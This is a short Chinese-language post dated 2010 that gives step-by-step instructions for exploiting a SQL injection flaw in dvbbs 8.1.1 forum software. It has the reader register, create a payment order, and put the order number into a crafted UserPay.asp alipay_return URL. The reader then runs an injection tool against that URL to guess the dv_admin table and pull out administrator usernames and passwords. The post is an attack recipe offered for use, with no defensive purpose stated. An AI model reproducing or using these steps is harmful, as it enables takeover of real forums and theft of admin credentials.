11 05 2010
dvbbs 8.1.1的漏洞
第一步:注册用户名
第二步:点用户控制面板 → 购买论坛点券 → 网上支付 然后查看 所有交易记录 记下 订单号
第三部 :将注入格式改成以下 http://www.XXX.com/bbs/UserPay.asp?raction=alipay_return&out_trade_no=订单号
第四部:打开注入工具把http://www.XXX.com/bbs/UserPay.asp?raction=alipay_return&out_trade_no=订单号填入 并在特征字符处填写非法的订单参数,然后得到注入点。表名输入dv_admin.猜出后输入username和password,得到管理用户和密码。